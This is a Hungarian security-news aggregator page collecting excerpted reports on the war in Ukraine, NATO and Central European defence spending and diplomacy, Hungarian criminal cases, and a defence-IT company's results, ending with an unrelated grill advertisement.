Biztonságpiac

A hivatalos források alapján William Burns, a CIA vezetője Szaúd-Arábiában, a királyság hírszerzésének főnökével, valamint vezető politikusokkal tárgyalt. A látogatás célja és megbeszélések témája a közlések szerint a hírszerzési együttműködés megerősítése volt, valamint „a közös érdekekről” is egyeztettek – olvasható a közleményben.

„Az igazgató megerősítette elköteleződésünket a hírszerzési együttműködés iránt, különös tekintettel a terrorizmus elleni küzdelem terén” – áll az amerikai közleményben.

A találkozóról elsőként beszámoló The Washington Post napilap úgy tudja, hogy a látogatás a hét első felében történt.

Az utazás tényének bejelentése amerikai tisztségviselők részéről egybeesett a szaúdi külügyminiszter pekingi látogatásával, ahol találkozott Irán külügyminiszterével. A konfliktusos viszonyt ápoló Irán és Szaúd-Arábia a közelmúltban kínai közvetítéssel vette fel ismét a diplomáciai kapcsolatokat, szaúdi-iráni külügyminiszteri találkozóra pedig több mint hét éve nem került sor.

Szaúd-Arábia az Egyesült Államok legrégibb és legerősebb szövetségese az arab világban, míg Iránnal szemben szankciók vannak érvényben, és az amerikai kormányzat többször elítélte a teheráni vezetést az emberi jogok többszörös megsértésére hivatkozva.

The post A CIA igazgatója tárgyalt Szaúd-Arábiában appeared first on .

„Bahmut irányában az ellenség folytatja a támadó hadműveleteket, megpróbálja teljesen átvenni az ellenőrzést a város felett, a heves csaták folytatódnak” – írta a vezérkar.

A jelentés szerint a nap folyamán az orosz erők sikertelen támadóműveleteket hajtottak végre a Donyeck megyei Orihovo-Vaszilivka és Bohdanyivka települések térségében. A frontnak ezen szakaszán az ukrán csapatok mintegy tíz ellenséges támadást vertek vissza. A térségben több mint 15 települést ágyúztak az orosz erők.

A vezérkar kitért arra, az ukrán légvédelem a nap folyamán hat csapást mért orosz csapatösszevonási területekre, a rakéta- és tüzérségi egységek pedig két orosz élőerő-tömörülést, két üzemanyagraktárt és egy elektronikus hadviselési állomást találtak el. Eközben az orosz hadsereg továbbra is fő erőfeszítéseit a Donyeck megyei Liman, Bahmut, Avgyijivka és Marjinka települések irányában történő támadó műveletek végrehajtására összpontosította.

The post Orosz agresszió: az ukrán erők több mint húsz támadást vertek vissza appeared first on .

Kifejtette, hogy a rakétarendszerek képesek rövid hatótávolságú mobil légvédelmet biztosítani a polgári infrastruktúra és az ukrán erők számára robotrepülőgépek, drónok, valamint alacsonyan haladó repülők és helikopterek ellen. Megjegyezte, hogy az Avenger alkalmas az iráni gyártású Sahid kamikaze drónok hatékony felderítésére és megsemmisítésére is. Elmondta, hogy a rendszer működtetéséhez ukrán katonák speciális kiképzést kaptak Németországban. Az Ukrajinszka Pravda hírportál beszámolója szerint az Avenger kezelésére kiképzett egyik ukrán katona elmondta, hogy a rendszer Stinger rakétákkal, és egy Browning nehézgéppuskával van felszerelve.

Az Egyesült Államok januárban jelentette be, hogy az újabb, 2,5 milliárd dollár értékű katonai segélycsomagja részeként nyolc Avenger légvédelmi rakétarendszert ad Ukrajnának – emlékeztetett az Ukrajinszka Pravda.

Az ukrán határőrszolgálat szerdai közleményében arról számolt be, hogy a Donyeck megyei Bahmutban házról házra folynak a harcok, az orosz erők fő erőfeszítéseiket arra összpontosítják, hogy áttörjék az ukrán csapatok védelmi vonalát a város ipari övezetében. Az ott szolgálatot teljesítő határőrök állását a Wagner orosz magánhadsereg egyszerre hat csoportja támadta meg, amit azonban a határőralakulat visszavert. A jelentés szerint 29 orosz katona halt meg, és legalább negyven megsérült.

Az ukrán vezérkar sajtószolgálata arról tájékoztatott, hogy a keleti fronton az ukrán erők megsemmisítettek egy K-52-es orosz helikoptert. A vezérkar esti helyzetjelentésében azt írta, hogy az ukrán erők szerdán több mint negyven orosz támadást vertek vissza. A beszámoló szerint az orosz erők fő erőfeszítéseiket változatlanul a Donyeck megyében lévő Liman, Bahmut, Avgyijivka és Marjinka települések irányában indított támadóműveletekre összpontosítják.

The post Orosz agresszió: hadrendbe állították az amerikai Avenger légvédelmi rendszereket appeared first on .

A felnőtt ukrán menekültek mintegy kétharmadát nők, míg a menekültek harmadát gyermekek teszik ki – mondta Pavla Novotná, a tárca migrációs ügyekkel foglalkozó szekciójának igazgatója prágai sajtótájékoztatóján.

Az Ukrajna elleni orosz támadás tavaly februári kezdete óta több mint félmillió ukrán állampolgár kért és kapott ideiglenes menedéket Csehországban. Mintegy kétszázezer rendkívüli engedély hatálya időközben megszűnt, mert a tavaly decemberben elrendelt megújítását az érintettek nem kérték. A minisztérium szerint valószínű, hogy ezek a személyek visszatértek Ukrajnába, vagy egy harmadik országba távoztak.

A legtöbb ukrán menekült Prágában (80 ezer) és Közép-Csehországban (45 ezer) él. A legkevesebben, alig tízezren, a közép-morvaországi Zlíni régióban telepedtek le. A menekültek közül mintegy 150 ezren már dolgoznak, többnyire alacsony szakképzettséget igénylő munkahelyeken. A magasabb szakképzettséget megkövetelő munkahelyek betöltését általában a nyelvtudás akadályozza.

A csehországi iskolákat jelenleg több mint hetvenezer ukrán gyermek látogatja. A hatályos szabályok szerint a rendkívüli csehországi tartózkodási engedélyt legfeljebb három évre lehet megszerezni a külföldieknek.

The post Orosz agresszió: Több mint 325 ezer ukrán menekült él Csehországban appeared first on .

Duda a szabad világ alapértékeinek nevezte a szabadságot, az országok szuverenitását, területi integritását, a demokráciát és a szolidaritást. Rámutatott: több államban növekszik az ukrajnai háború okozta fáradtság, és megjelenik „az orosz propaganda és dezinformáció által is táplált kísértés, hogy mindenáron és minél hamarabb tűzszünetet érjenek el”, ennek következtében pedig Ukrajna számára kedvezőtlen békét kössenek Oroszországgal.

A lengyel államfő elutasította a Putyin iránti engedmények politikáját, mely – mint mondta – lényegében kiváltotta a jelenlegi ukrajnai agressziót.

Csak Ukrajna dönthet arról, mely elvek szerint folytat béketárgyalásokat – jelentette ki Duda, hozzátéve: a világ vezetői csak azon feltétel teljesítését kell követelniük Moszkvától, amely értelmében az orosz csapatokat teljesen ki kell vonniuk Ukrajna nemzetközileg elismert területéről. „Szó sem lehet az ukránok feje fölött folytatott akármilyen tárgyalásról” – hangsúlyozta.

A lengyel-ukrán történelmi kapcsolatok nehéz fejezeteire, köztük a Lengyelország által népirtásnak minősített 1942-1943-as volhíniai mészárlásra utalva Duda kijelentette: a két ország vezetői „nem tartanak az akár a legnehezebb történelmi témákról folytatandó párbeszédről sem”. Hozzátette: a két nemzet közötti kapcsolatokat „az igazságon és a kölcsönös bizalmon fogják építeni”.

Szerinte a nagy nemzetek a történelem döntő pillanataiban képesek „túllépni legnagyobb nézeteltéréseiken, és együtt néznek a jövőbe”.

Zelenszkij a beszédében kiemelte: meg kell oldani mindent, ami a lengyel és az ukrán társadalom érdekei és békéje végett megoldásra vár, a katonai, politikai, gazdasági és energetikai együttműködéstől kezdve egészen „a történészek fáradságos munkájáig”.

A történelmi igazságtételről az ukrán elnök Oroszországra vonatkozóan is beszélt, amikor azon reményének adott hangot, hogy Lengyelország és Ukrajna „közös ellenségét felelősségre vonják Bucsáért és Bikovnyáért, Katynért és Szmolenszkért”. Zelenszkij ezzel egyrészt a jelenlegi ukrajnai háborús bűntettekre utalt, másrészt az 1940 tavaszán a szovjet Belügyi Népbiztosság (NKVD) által a lengyel tiszteken elkövetett katyni mészárlásra, valamint a 2010-es szmolenszki légikatasztrófára is.

A két elnök a Királyi Vár udvarán mondta beszédét, ahol – amint a vár előtti téren is – lengyel és ukrán zászlókat lobogtató tömeg hallgatta meg őket. A beszédekkel lezárult Zelenszkij varsói látogatásának hivatalos programja. Ez volt az ukrán elnök első hivatalos lengyelországi látogatása az ukrajnai háború kitörése óta.

The post Orosz agresszió: Duda szerint nem szabad az ukránok feje fölött tárgyalni a békéről appeared first on .

A legnagyobb értékű – 4,2 milliárd eurós – beszerzés a SHORAD, illetve VSHORAD (rövid és nagyon rövid hatótávolságú) légvédelmi rakétarendszerekre vonatkozik. A MAPN 16 üteget a légierő, kilenc üteget pedig a szárazföldi csapatok felszerelésére szán, a két szakaszban megvalósítandó fegyverbeszerzés első szakasza 2030-ig tartana.

A bukaresti védelmi tárca 2,995 milliárd eurót tervez költeni 298 lánctalpas harckocsi beszerzésére, 1,923 milliárd dolláros költségvetésből a MAPN a szárazföldi csapatok öt zászlóalját látná el egy-egy 155 milliméteres kaliberű önjáró löveggel, megfelelő lőszerrel, illetve logisztikával, és tüzéreket képezne ki.

A védelmi tárca további 372 millió dollárért vásárolna az Egyesült Államokkal kötendő kormányközi megállapodás révén 186 darab AIM-120 AMRAAM típusú, radarvezérlésű, közép-hatótávolságú levegő-levegő rakétát a légierő F-16-os harci gépei számára.

Az ötödik beszerzési program is az F-16-os harci repülőgépek felfegyverzésére irányul: a tárca 239 millió dollárt akar költeni a MAPN 299 rövid hatótávolságú, infravörös vezérlésű AIM-9X SIDEWINDER típusú levegő-levegő rakéta beszerzésére.

Romániában előzetes parlamenti jóváhagyás szükséges a százmillió eurós értéket meghaladó közbeszerzések elindításához, amelyről a MAPN esetében az egyesített védelmi bizottság hivatott dönteni.

Románia az ukrajnai háború kitörését követően úgy döntött: 2023-tól kezdődően a GDP 2,5 százalékára emeli (a korábbi 2 százalékról) védelmi kiadásait. A 2017-ben indult haderőfejlesztés során a bukaresti védelmi tárca főleg amerikai gyártmányú haditechnikák – Patriot rakétaelhárító rendszerek, HIMARS sorozatvetők és F-16-os harci repülők – beszerzéséről döntött.

The post Tízmilliárd dolláros fegyverkezési programot hagyott jóvá a román parlament appeared first on .

Mint írták, a Bács-Kiskun Vármegyei Kormányhivatal egyik járási hivatala március 20-án két kiskorú gyermeket ideiglenes hatállyal nevelőszülőnél rendelt elhelyezni. A gyámhivatal előzetes eljárása során felmerült, hogy az apa a határozat végrehajtása során agresszíven léphet fel, ezért rendőri segítséget kértek.

A kormányhivatal felkérésére a polgármesteri hivatalnál megjelenő három rendőr és a kormánytisztviselők a közelben lévő presszónál meglátták az egyik gyermeket és az anyját, akinek kézbesíteni akarták a határozatot. Amikor tájékoztatták az asszonyt, hogy határozat született a gyermek elviteléről, kiabálva trágár szavakkal illette a járási hivatal dolgozóit, majd telefonon odahívta élettársát.

Miközben az egyik kormánytisztviselő az anya tiltakozása ellenére elvitte a gyermeket, megérkezett az apa, aki azt üvöltötte a jogszerűen intézkedő rendőröknek és a járási hivatal munkatársainak, hogy: „engedjétek el, az az én gyerekem, megöllek titeket”. A férfi meg akarta ütni és rúgni az egyik rendőrt, de ő sikeresen védekezett. A rendőr megbilincselni már nem tudta az ellenszegülő férfit, aki ekkor már az élettársát biztosító rendőrökre próbált támadni, de a feléjük irányzott ütések és rúgások sem értek célt.

A Szegedi Regionális Nyomozó Ügyészség elrendelte a többszörösen büntetett előéletű – felfüggesztett szabadságvesztés és folyamatban lévő büntetőeljárás hatálya alatt álló – férfi őrizetét, majd gyanúsítottként hallgatta ki hivatalos személy elleni erőszak bűntette miatt.

A bíróság az ügyészség indítványára a gyanúsított letartóztatását – a bűnismétlés és a bizonyítás megnehezítésének veszélye miatt – egy hónapra elrendelte. A végzés ellen a gyanúsított és védője fellebbezést jelentett be, amelyet a Szegedi Törvényszék elutasított – áll a közleményben.

The post Már megint rendőrre támadtak, letartóztatásban az elkövető appeared first on .

A tisztségviselő tájékoztatása szerint a kisvárost helyi idő szerint délelőtt 11 óra körül érte a támadás, az orosz erők lakott területet találtak el. Hozzátette, hogy az első információk szerint a támadók kazettás lövedékeket vetettek be. A helyszínen pirotechnikusok dolgoznak a fel nem robbant lövedékek hatástalanításán.

Jurij Huszjev, az Ukroboronprom ukrán állami hadikonszern vezérigazgatója az Interfax-Ukrajina hírügynökségnek adott interjújában elmondta, hogy az Oroszország által Ukrajna ellen indított háború tavaly februári kezdete óta a vállalat létesítményeit több mint 150 támadás érte, de ennek ellenére még növelték is a gyártást, egyebek között áthelyezéssel, és magáncégekkel való együttműködéssel. Kiemelte, hogy a vállalathoz több mint hatezer új alkalmazottat vettek fel. Szavai szerint mostanra az állami konszern mintegy száz olyan céggel kezdett együttműködést, amelyek korábban nem gyártottak semmit a fegyveres erők számára.

A vezérigazgató elmondta, hogy az állami konszern a haditechnikai eszközök biztonságos helyen történő gyártására és javítására irányuló programot hajt végre, nemcsak a régi szovjet berendezések javítását végzi, hanem a lefoglalt, és a partnerországoktól kapott eszközökét is.

Az ukrán vezérkar szerdai helyzetjelentésében arról számolt be, hogy az orosz hadsereg embervesztesége Ukrajnában meghaladta a 176 ezret. Az elmúlt nap folyamán az ukrán erők egyebek mellett megsemmisítettek két orosz harckocsit és tíz tüzérségi rendszert.

The post Orosz agresszió: újabb polgári áldozatok appeared first on .

Stoltenberg felhívta a figyelmet: „Kína nem hajlandó elítélni Oroszország agresszióját, visszhangozza az orosz propagandát, és támogatja az orosz gazdaságot, miközben együttesen fokozzák katonai tevékenységüket a csendes-óceáni térségben”.

„Kína és Oroszország egyre közelebb kerülnek egymáshoz. Alig néhány héttel az ukrajnai invázió előtt aláírtak egy partnerségi megállapodást, amelyben egyértelműen kijelentik, hogy az orosz-kínai partnerségnek nincsenek határai” – mutatott rá.

Véleménye szerint ez szükségessé teszi a szövetség számára, hogy újragondolja Kínával kapcsolatos politikáját, ami magában foglalja a független partnerekkel, Ausztráliával, Új-Zélanddal, Japánnal, Dél-Koreával folyó együttműködést.

A főtitkár kitért Oroszország bejelentésére is arról, hogy taktikai atomfegyvereket fog állomásoztatni Fehéroroszországban. Szerinte ez azt mutatja, hogy a pár nappal korábban Kínával aláírt megállapodása, miszerint az országoknak nem szabad nukleáris fegyvereket határaikon túlra telepíteni, csupán „üres ígéret” volt.

A főtitkár a kétnapos tanácskozást összegezve elmondta: a NATO-tagországok új kötelezettségvállalásokat tettek az ukrán erők folyamatos katonai támogatására vonatkozóan, és megállapodtak abban, hogy egy többéves stratégiai segítségnyújtási programot dolgoznak ki Ukrajna számára. Mint mondta, azt, hogy mikor ér véget a háború, még nem lehet tudni, de fel kell arra készülni, hogy Putyin ne tudja még jobban aláásni az európai biztonságot.

„Ezért lehetővé kell tennünk Ukrajna számára, hogy megvédje magát a jövőbeni agresszióval szemben, ami segíteni fogja az országot az euroatlanti integráció felé vezető úton is” – hangsúlyozta.

Stoltenberg elmondása szerint a hosszú távú segítségnyújtási program magában foglalja az ország védelmi kapacitásainak megerősítését, valamint a szovjet gyártmányú felszerelésekről a NATO-szabványúakra való áttérés megkönnyítését. Hangsúlyozta: ahhoz hogy Ukrajna a szövetség teljes jogú tagjává váljon, függetlennek és demokratikusnak kell lennie.

„Ha Putyin győz Ukrajnában, az veszélyes üzenetet küld a világ tekintélyelvű vezetőinek arról, hogy céljaikat nyers erővel is elérhetik” – figyelmeztetett. Hozzátette, hogy a NATO továbbra is támogatni fogja az orosz nyomás alatt álló partnerországokat, köztük Moldovát, Georgiát és Bosznia-Hercegovinát.

The post Jens Stoltenberg: történelmi hiba lenne, ha Kína katonailag támogatná Oroszországot appeared first on .

„A segítség értéke, amelyet a hadsereg vezérkari főnökével (Karel Rehka) együtt terveztünk meg mintegy 600-700 millió korona. Nem pénzbeli segítségről, hanem a raktárainkban lévő hadianyagokról van szó” – jelentette ki a tárcavezető újságírók előtt. „Úgynevezett felesleges anyagról van szó, amelyet anélkül küldhetünk Ukrajnába, hogy ezzel veszélyeztetnénk saját védelmi képességeinket” – tette hozzá Jana Cernochová. Hangsúlyozta: nagyon ügyel arra, hogy csak olyan hadianyagot és fegyvereket küldjön Csehország Ukrajnába, amelyet a hadsereg nélkülözni tud, illetve gyorsan képes mással helyettesíteni.

Tekintettel a háborús helyzetre Cernochová nem részletezte, milyen hadianyagról is van szó.

Petr Pavel cseh államfő a Süddeutsche Zeitung nevű német lapnak a közelmúltban azt mondta: Csehország továbbra is segíteni fogja az orosz agresszió ellen harcoló Ukrajnát, de már nincs sok lehetősége további hadianyagot és fegyvereket küldeni az ukránoknak. Az elnök szerint nagyobb tartalékok még a légvédelmi fegyverek, illetve a lőszer terén vannak.

A prágai sajtóban megjelent nemhivatalos értesülések szerint Csehország eddig több mint ötvenmilliárd korona értékű segélyt küldött Ukrajnába, ebből a kormányzat által küldött segély értéke mintegy 15 milliárd koronát tesz ki. Ennek nagyobbik részét fegyverek és hadianyagok képezték.

Morawiecki és Zelenszkij aláírták a hadfelszerelés szállításáról szóló szándéknyilatkozatot
KTO Rosomak típusú páncélozott harcjárművek és egyéb hadifelszerelés szállításáról szóló szándéknyilatkozatot írt alá szerdán Varsóban Mateusz Morawiecki lengyel kormányfő és Volodimir Zelenszkij ukrán elnök. A két vezető a kétoldalú tárgyalásokat követően látta el kézjegyével a dokumentumot. Morawiecki és Zelenszkij jelenlétében aláírták továbbá a 125 milliméteres harckocsilőszer közös gyártásáról szóló megállapodást, valamint azt a szándéknyilatkozatot is, amely a lengyel cégek részvételéről szól Ukrajna háború utáni újjáépítésében. Morawiecki szombaton közölte, hogy Ukrajna száz új KTO Rosomak típusú páncélozott harcjárművet rendelt Lengyelországtól.

The post Orosz agresszió: Csehország ismét hadianyagot küld Ukrajnának appeared first on .

A főtitkár hangsúlyozta: „egy erős, független Ukrajna létfontosságú az atlanti térség stabilitása szempontjából, a NATO Ukrajna mellett áll, amíg csak szükséges, mert az ország jövője az atlanti családban van”.

Stoltenberg emlékeztetett: a NATO már közel 150 milliárd euró támogatást, ebből 65 milliárd euró katonai segélyt nyújtott Kijevnek. Felhívta azonban a figyelmet, hogy még „nincs itt az ideje az önelégültségnek”, mert „Putyin változatlan irányt követ Ukrajnával kapcsolatban”, úgy véli, hogy „Oroszország felül tud kerekedni a szövetségesek Ukrajna melletti támogatása ellenére”.

„Ezért a tagállamok fokozzák a fegyverek és a lőszerek gyártását, és teljesítik a kiképzésre és új nehézfegyverzetre vonatkozó ígéreteiket. Üdvözlöm, hogy a külügyminiszterek ma erről bejelentéseket tettek, és a következő napokban és hónapokban még többre számítok” – jelentette ki. Mint mondta, erre építve a NATO többéves támogatási programot fog kidolgozni Ukrajna számára, hogy megerősítse az ország védelmi kapacitásait, valamint az áttérést a szovjet gyártmányú felszerelésekről a NATO-szabványúakra.

A főtitkár bejelentette, hogy Volodomir Zelenszkij ukrán elnök is részt vesz a júliusban Vilniusban megrendezendő NATO-csúcstalálkozón.

A NATO-bővítésről szólva elmondta, hogy Finnország kedden teljes jogú tagja lett a szövetségnek, ami garantálja saját biztonságát, de egyúttal fejlett védelmi kapacitásával hozzájárul a többi tagállam védelméhez.

Svédország csatlakozásának ratifikálási folyamatával kapcsolatban Stoltenberg azt mondta, hogy a „patthelyzet megoldódott, sikerült túllendülni a holtponton”. „Folytatjuk a munkát a különböző szinteken, hogy előre tudjunk lépni a svéd csatlakozással kapcsolatban is. Svédország tehát taggá fog válni. Keményen dolgozunk azon, hogy ez minél hamarabb megtörténjen” – jelentette ki.

The post Stoltenberg: a NATO továbbra is elkötelezett „a nyitott ajtók politikája” mellett appeared first on .

A cégcsoport nettó árbevétele 10,93 milliárd forint volt, ami 71,5 százalékkal magasabb az egy évvel korábbinál.

Csontos Zoltán, a Delta Technologies Nyrt. igazgatóságának elnöke a közlemény szerint kiemelte: a 2025-ig megfogalmazott növekedési ütemtervet fenntartják. A 2027-es üzleti évre a Delta Technologies Nyrt. célkitűzése, hogy a csoportszintű árbevétel 50-55 milliárd forint közötti szintre emelkedjen, ami a jelzett időszakban átlagosan évi 16 százalék árbevétel növekedésnek felelne meg.

A Delta Technologies az üzleti év eredményei között kiemelte: leányvállalatának, a Delta Systems Kft.-nek lehetősége nyílik a minősítési szintje szerinti NATO Biztonsági Beruházási Programok keretében meghirdetett beszerzési eljárásokon való részvételre. A vállalat a minősítéssel tagja lett annak a mintegy 250 hazai cégnek, amelyek NATO beszállítói képesség birtokában vannak.

A jövőt illetően a jelentés kiemeli, hogy a Delta Systems Kft. az igazgatóság elvi támogatásával tárgyalásokat folytat a New Line Kft. nyereséges support üzletágának megvásárlásáról, továbbá a Delta Informatika Zrt. alaptőkéjének száz százalékát kitevő részvénymennyiség megvásárlásáról, és egyidejűleg a Delta Informatika Zrt. a Delta Systems Kft.-be történő beolvasztásáról is. A féléves jelentéskészítés közzétételének időpontjában a leányvállalatok Delta Systems Kft.-be történő beolvadása is befejeződött. További céljuk, hogy elérjék a Delta részvények BÉT standard kategóriából a BÉT prémium kategóriába való átsorolását.

Tájékoztattak arról is, hogy mintegy 1800 milliárd forintra rúg azon informatikai keretmegállapodások összértéke, ahol a Delta valamilyen formában beszállítóként – akár konzorcium vezetőjeként vagy tagjaként – közreműködik. Ugyanakkor folyamatosan figyelik az EU Helyreállítási és Ellenállóképességi Eszköz programjának (RRF) digitális alfejezetében várható kiírásokat, hiszen a 680 milliárd forintos keretben meghirdetendő programokra a Delta kompetenciái és korábbi referenciái is biztosítottak.

The post Nyereséges volt a NATO-ready Delta Technologies appeared first on .

A közlemény szerint tíz katona és két civil került vissza ukrán területre. A civilek közül egy Harkiv megyéből, egy pedig a Donyeck megyei Mariupolból származik. A parancsnokság arra nem tért ki, hogy cserébe az ukrán fél adott-e át orosz foglyokat. Az Ukrajinszka Pravda hírportál emlékeztetett arra, hogy március 24-én Ukrajna egyoldalúan és feltétel nélkül visszaadta Oroszországnak mind az öt súlyosan megsebesült orosz foglyot, akik szállítható állapotban voltak.

Olekszandr Szirszkij, az ukrán szárazföldi erők parancsnoka közölte, hogy találkozott a Donyeck megyei Bahmut városát védő ukrán katonákkal, és cáfolta a város bevételéről közzétett orosz állításokat. Szavai szerint folyamatos kapcsolatban van azokkal az ukrán alakulatokkal, amelyek a front legkritikusabb részein teljesítenek szolgálatot. „Találkoztam azokkal a katonákkal és parancsnokokkal, akik lerombolták a Wagner-zsoldosok és az orosz ejtőernyősök legyőzhetetlenségéről szóló mítoszt” – jelentette ki, ugyanakkor nem pontosította, hogy legutóbb mikor találkozott Bahmut védőivel.

„Az ellenség gyengül, ezért újabb és újabb hamisítványokkal próbálja leplezni a Bahmut elfoglalására irányuló erőfeszítéseinek kudarcait” – tette hozzá. Szirszkij legutóbb március 27-én hozta nyilvánosságra, hogy látogatást tett a Bahmutot védő ukrán alakulatoknál. A szárazföldi erők parancsnokát megelőzően Szerhij Cserevatij, az ukrán keleti erők szóvivője, és Andrij Jermak, az ukrán elnöki iroda vezetője cáfolta, hogy a Wagner orosz zsoldoscsoport elfoglalta volna a bahmuti városházát, ahogy azt Jevgenyij Prigozsin, a Wagner-csoport alapítója egy videóüzenetben bejelentette.

„Semmit sem foglaltak el, és enyhén szólva messze vannak attól, hogy bármit is elfoglaljanak a városban” – jelentette ki a szóvivő egy sajtónyilatkozatában. Hozzátette: harcok folynak a városháza épülete körül, de „jogi értelemben az orosz erők nem foglaltak el semmit”.

Az ukrán vezérkar esti helyzetjelentésében arról számolt be, hogy erőik hétfőn több mint 45 orosz támadást vertek vissza, a harci cselekmények epicentrumában továbbra is a donyecki régió három települése, Bahmut, Avgyijivka és Marjinka van. A jelentés szerint az ukrán légierő a nap folyamán öt csapást mért orosz élőerő- és fegyverzetgócpontokra, valamint megsemmisítettek egy orosz drónt. A rakéta- és tüzérségi egységek egy orosz csapatösszpontosulásra mértek csapást. Eközben az orosz erők három rakéta- és 17 légicsapást intéztek, valamint több mint húsz támadást hajtottak végre rakéta-sorozatvetőkkel az ukrán csapatok állásai, és a települések polgári infrastruktúrája ellen – írta az ukrán vezérkar.

Volodimir Zelenszkij, ukrán elnök az Ukrinform hírügynökség szerint kijelentette, hogy az ukrán hadsereg nagyszabású ellentámadást fog végrehajtani, és Ukrajna minden ideiglenesen megszállt területét visszafoglalják. Részleteket nem árult el, azt sem, mikor indul az ellentámadás – mint mondta – azért, hogy Oroszország ne tudjon felkészülni rá. „Az orosz csapatoknak még van idejük elhagyni Ukrajnát, különben megsemmisítjük őket” – szögezte le Zelenszkij. Az ukrán vezérkar hétfői helyzetjelentésében közölte, hogy mostanra az orosz hadsereg Ukrajnában elszenvedett embervesztesége meghaladta a 175 ezret.

The post Orosz agresszió: újabb ukrán foglyok térhettek haza appeared first on .

A moszkvai tájékoztatás szerint az üggyel kapcsolatban Lavrov felhívta Blinken figyelmét arra, hogy tiszteletben kell tartani az orosz hatóságok lépéseit, amelyeket a jogrenddel és Oroszország nemzetközi kötelezettségeivel összhangban tettek meg. Az orosz tárcavezető megengedhetetlennek nevezte azt, ahogy washingtoni tisztségviselők és a nyugati média felháborodást keltenek „azzal a nyilvánvaló szándékkal, hogy politikai színezetet adjanak az ügynek”.

„Lavrov kiemelte, hogy Evan Gershkovich-ot tetten érték, amikor újságírói státuszának álcája alatt próbált meg államtitoknak minősülő adatokhoz jutni” – állt a közleményben. Az orosz fél közölte, hogy a törvénybe ütköző tevékenységet folytató amerikai állampolgár őrizetbe vételéről az Egyesült Államok moszkvai nagykövetségét az előírásoknak megfelelően értesítették, Gershkovich sorsáról pedig bíróság fog dönteni.

Az orosz külügyminisztérium szerint Lavrov és Blinken néhány kétoldalú kérdést is megvitatott.

The post A kémkedéssel gyanúsított újságíróról tárgyalt az orosz és az amerikai külügyminiszter appeared first on .

„Ha ez meg is történne, az Csehország lakossága számára semmiféle veszélyt nem jelentene” – mondta a tárcavezető kérdésre válaszolva.

Moszkva azon bejelentésére reagálva, hogy Oroszország taktikai atomfegyvereket telepít a szomszédos Fehéroroszországba, Cernochová leszögezte: Csehország semmi esetre sem számol azzal, hogy területére atomfegyvereket telepíthetnének. „Semmi ilyesmi nincs napirenden” – hangsúlyozta a védelmi miniszter.

Cernochová szerint a NATO júliusi vilniusi csúcstalálkozóján várhatóan döntés születik a szervezet keleti szárnyának további megerősítéséről. A miniszter úgy vélte, hogy erre az orosz bejelentés nélkül is sor került volna. „Az Ukrajnában lejátszódó eseményeket nem lehet figyelmen kívül hagyni” – mutatott rá Cernochová.

Lubomír Metnar korábbi védelmi miniszter, Cernochová beszélgetőpartnere szintén úgy fogalmazott, hogy „az orosz bejelentésre mindenképpen reagálni kell”.

Cernochová szerint nem valószínű, hogy az orosz-ukrán konfliktus gyorsan befejeződne, másfelől folyamatos erőfeszítéséket kell tenni a problémák diplomáciai megoldása érdekében. „Mindegy, hogy ki fog közvetíteni, akár a Nyugat, akár egy Oroszországhoz közeli ország” – jegyezte meg a miniszter. Hozzátette, Kínát sem lehet kizárni.

The post A cseh lakosság számára állítólag nem jelentene fenyegetést az atomfegyverek bevetése Ukrajnában appeared first on .

A Miskolci Törvényszék közleménye szerint a fiatal az üzenetváltások során kilátásba helyezte az általa méltatott lövöldözésekhez hasonló cselekmény végrehajtását. A nyomozás jelenlegi állása szerint a fiatalkorú gyanúsított cselekménye emberölés előkészülete bűntettének megállapítására alkalmas.

A bíróság álláspontja szerint megalapozottan feltehető, hogy a gyanúsított a bizonyítást veszélyeztetné tárgyi bizonyítási eszköz, elektronikus adat megsemmisítésével, elrejtésével, esetleg szabadlábon lévő társaival összebeszélne, őket az eljárásról tájékoztatná. Fennáll annak a veszélye is, hogy a cselekményt folytatná vagy az előkészített bűncselekményt véghez vinné – írták.

A közlemény szerint mindezekre, valamint a bűncselekmény kiemelkedő társadalomra veszélyességére tekintettel a bíróság vasárnap egy hónapra elrendelte a fiatal letartóztatását, amelyet javítóintézetben kell végrehajtani. A végzés nem végleges — közölte a Miskolci Törvényszék.

The post Letartóztatásban egy fiatalkorú emberölés előkészületének gyanúja miatt appeared first on .

A közép- és kelet-európai NATO-tagállamokat tömörítő B9 csoport csütörtök este kezdődött tanácskozásán történteket a lengyel diplomácia vezetője román hivatali partnerével, Bogdan Aurescu román külügyminiszterrel együtt foglalta össze. Rau kiemelte: megvitatták „az európai biztonsági helyzet romlását”, a NATO keleti szárnyának megerősítésére irányuló erőfeszítéseket, valamint Ukrajna „politikai és gyakorlati támogatását”.

A résztvevők beszéltek a NATO és az Európai Unió közötti együttműködés fontosságáról, különösen a „jelenlegi válságra adandó hatékonyabb válasz” érdekében.

A B9 „katonai és más területeken továbbra is támogatni fogja Ukrajnát” – jelentette ki a lengyel külügyi tárca vezetője. Hozzátette: Lengyelország és „sok más szövetséges állam számára különösen az utóbbi szempont óriási jelentőséggel bír”. Rámutatott, hogy a B9 országai élen járnak e téren, olyan, „bátrabb akciókban” való részvételre buzdítják szövetségeseiket, mint a MiG-29-es vadászgépek vagy a (Leopard) harckocsik átadása Ukrajnának.

Bogdan Aurescu úgy vélte: az Ukrajna elleni orosz háború „Európa és Amerika biztonságát veszélyeztető művelet”, amely „komoly fenyegetést jelent a globális békére” nézve is. A béke érdekében „segíteni kell Ukrajnát, hogy megnyerje ezt a háborút” – fogalmazott a román diplomácia vezetője. Fontosnak nevezte, hogy az orosz tiszteket „felelősségre vonják azért, amit Ukrajnában műveltek”.

Aurescu szavai szerint a lódzi találkozó résztvevői a júliusi vilniusi NATO-csúcstalálkozó előtt megerősítették együttműködési szándékukat az észak-atlanti szövetség keretében. Fontosnak nevezte, hogy előrelépés történjen Ukrajna NATO-tagságának kérdésében.

A Bukaresti Kilencek vagy a Bukaresti Formátum (röviden B9 vagy B-9) egy 2015 novemberében alapított csoportosulás, amely Románia fővárosában, Bukarestben jött létre, Klaus Johannis román és Andrzej Duda lengyel elnök kezdeményezésére. Tagjai a NATO kelet-európai tagállamai: Lengyelország és Románia mellett Bulgária, Csehország, Észtország, Magyarország, Lettország, Litvánia és Szlovákia. Célja a NATO keleti szárnyának országai közötti katonai együttműködés elmélyítése, valamint a legfontosabb biztonságpolitikai kérdések megvitatása. A B9 lengyelországi találkozóján részt vett a csoporthoz nem tartozó Svédország, Finnország, Spanyolország és a NATO küldöttsége is.

The post Orosz agresszió: a Bukaresti Kilencek folytatják Ukrajna támogatását appeared first on .

A faszenes kerti grillek jelenleg a kerttulajdonosok egyik legnépszerűbb vásárlása! Ha szeretne egy kerti grillt, de nincs meggyőződve arról, hogy megéri-e a befektetést, a következő sorokban 5 igazán jó okot részletezünk!

